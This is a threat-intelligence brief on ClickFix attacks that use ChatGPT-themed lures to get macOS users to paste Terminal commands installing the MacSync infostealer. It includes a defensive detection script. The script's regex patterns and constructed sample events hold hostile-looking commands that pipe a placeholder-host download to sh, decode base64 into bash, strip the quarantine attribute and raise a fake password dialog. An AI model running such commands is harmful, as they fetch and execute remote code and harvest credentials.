ClickFix Campaigns Target macOS Users with ChatGPT‑Powered Lures Deploying MacSync Infostealer
What Happened — Sophos researchers identified a new wave of ClickFix attacks that have migrated from Windows‑only to macOS environments. Attackers use ChatGPT‑related search results and forged GitHub‑style installation pages to convince victims to copy‑paste malicious Terminal commands, which download and execute the MacSync infostealer.
Why It Matters for TPRM —
- Social‑engineering techniques that exploit trusted AI services can bypass traditional security controls on employee workstations.
- macOS devices are increasingly used in high‑value sectors (design, finance, R&D); a successful infection can lead to credential theft and exfiltration of proprietary data.
- The campaign’s tracking infrastructure (JS analytics, Telegram bots) provides attackers with real‑time visibility into which third‑party vendors’ employees are being compromised.
Who Is Affected — Enterprises that allow macOS endpoints, especially in technology, finance, education, creative services, and any organization that promotes AI‑assisted tooling.
Recommended Actions —
- Reinforce user awareness training focused on AI‑generated content and “copy‑and‑paste” commands.
- Enforce application allow‑lists and enable strict Gatekeeper/XProtect policies; consider endpoint detection that flags Terminal commands which download and execute remote content, since that is exactly what the pasted ClickFix commands do.
- Deploy network‑level URL filtering to block known malicious domains used in ClickFix payload delivery.
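One way to act on the endpoint‑detection recommendation above, as an added example that is not part of the Sophos research or the Security Affairs article: a small triage routine that reads process‑execution telemetry (one JSON object per line) and scores each command line against patterns typical of "copy this into Terminal" lures. It generalizes beyond the specific ChatGPT lure to the common shapes such commands take (remote fetch piped or substituted into a shell, base64 decoding into a shell, quarantine‑attribute removal, hidden‑answer password dialogs). The event schema, the indicator list and weights, the alert threshold and the allow‑list of tolerated installer sources are all assumptions for illustration; the sample events are constructed and use placeholder hosts.

```python
import json
import re

# Indicator patterns (name, regex, weight). The set and the weights are an
# assumption for illustration; tune them against your own telemetry.
INDICATORS = [
    ("fetch_piped_to_shell",
     re.compile(r"\b(?:curl|wget)\b[^|]*\|\s*(?:sudo\s+)?(?:ba|z)?sh\b"), 4),
    ("fetch_substituted_into_shell",
     re.compile(r"(?:ba|z)?sh\s+-c\s+[\"']?\$\((?:curl|wget)\b"), 4),
    ("base64_decoded_to_shell",
     re.compile(r"base64\s+(?:-d|-D|--decode)\b[^|]*\|\s*(?:ba|z)?sh\b"), 4),
    ("echo_piped_to_shell",
     re.compile(r"\becho\b[^|]*\|\s*(?:ba|z)?sh\b"), 3),
    ("quarantine_attr_removed",
     re.compile(r"\bxattr\b.*(?:-d\s+com\.apple\.quarantine|\s-c\b|\s-r\b)"), 3),
    ("hidden_password_dialog",
     re.compile(r"\bosascript\b.*display dialog.*hidden answer"), 3),
    ("silent_download_flags",
     re.compile(r"\bcurl\b[^|]*\s-[A-Za-z]*s[A-Za-z]*\b"), 1),
    ("hidden_file_in_tmp",
     re.compile(r"/(?:tmp|private/tmp|var/tmp)/\.[\w.-]+"), 1),
]

# Indicators that alone describe a routine "curl | sh" software install.
FETCH_ONLY = {"fetch_piped_to_shell", "fetch_substituted_into_shell",
              "silent_download_flags"}

# URL prefixes whose piped installers are tolerated here. Placeholder list
# (assumption); the well-known Homebrew installer is used as the one entry.
ALLOWED_SOURCE_PREFIXES = {"raw.githubusercontent.com/Homebrew/install/"}

# Interactive terminal parents: a pasted command is more characteristic of a
# ClickFix lure than the same line launched by an agent or a cron job.
INTERACTIVE_PARENTS = {"Terminal", "iTerm2"}

URL_RE = re.compile(r"https?://([^\s\"'|)]+)")


def score_event(event):
    """Return (score, indicator names) for one exec-telemetry event (a dict)."""
    cmd = event.get("cmdline", "")
    hits = [name for name, rx, _ in INDICATORS if rx.search(cmd)]
    urls = URL_RE.findall(cmd)
    # Suppress a pure install-from-known-source command; anything beyond a
    # fetch (password prompt, xattr stripping, base64 staging) still scores.
    if urls and set(hits) <= FETCH_ONLY and all(
            any(u.startswith(p) for p in ALLOWED_SOURCE_PREFIXES) for u in urls):
        return 0, ["allow_listed_source"]
    weights = {name: w for name, _, w in INDICATORS}
    score = sum(weights[h] for h in hits)
    if hits and event.get("parent") in INTERACTIVE_PARENTS:
        score += 1
        hits.append("interactive_terminal_parent")
    return score, hits


def triage(ndjson_text, threshold=4):
    """Parse newline-delimited JSON events; return those at or above threshold."""
    findings = []
    for line in ndjson_text.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        score, hits = score_event(event)
        if score >= threshold:
            findings.append({"pid": event.get("pid"), "user": event.get("user"),
                             "score": score, "indicators": hits,
                             "cmdline": event.get("cmdline", "")})
    return findings


# Constructed sample telemetry (not real captures); hosts are placeholders
# except the Homebrew installer, included to show the allow-list working.
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    {"pid": 4101, "user": "jdoe", "parent": "Terminal",
     "cmdline": '/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"'},
    {"pid": 4188, "user": "jdoe", "parent": "Terminal",
     "cmdline": "echo 'aGVsbG8gd29ybGQ=' | base64 -d | bash"},
    {"pid": 4203, "user": "jdoe", "parent": "Terminal",
     "cmdline": "curl -s https://cdn.example.invalid/install.sh | sh"},
    {"pid": 4210, "user": "jdoe", "parent": "bash",
     "cmdline": "xattr -d com.apple.quarantine /tmp/.update && osascript -e "
                "'display dialog \"Enter password\" default answer \"\" with hidden answer'"},
    {"pid": 4220, "user": "build", "parent": "launchd",
     "cmdline": "curl -o /tmp/report.json https://api.example.invalid/report"},
])

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"pid={f['pid']} user={f['user']} score={f['score']} "
              f"{','.join(f['indicators'])}")
```

Run against the constructed sample, the Homebrew install and the build job's plain `curl -o` are left alone, while the base64‑staged command, the unknown `curl | sh`, and the quarantine‑stripping plus password‑dialog line are reported. The allow‑list only suppresses commands that do nothing but fetch from a tolerated source, so the same source combined with a password prompt or `xattr` removal still alerts; that distinction is what keeps developer installers from drowning out the ClickFix pattern.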
Technical Notes — Attack vector: phishing‑style lures via malicious Google‑sponsored links and fabricated ChatGPT conversation pages. The malicious Bash script is obfuscated, prompts the user for their password, and then pulls a Mach‑O binary (MacSync) that harvests credentials, browser data, and files. Because the victim runs the commands in Terminal themselves rather than opening a downloaded application, the payload sidesteps the quarantine‑based checks that Gatekeeper and XProtect apply to downloaded apps, which is how the technique circumvents those macOS security controls. Source: Security Affairs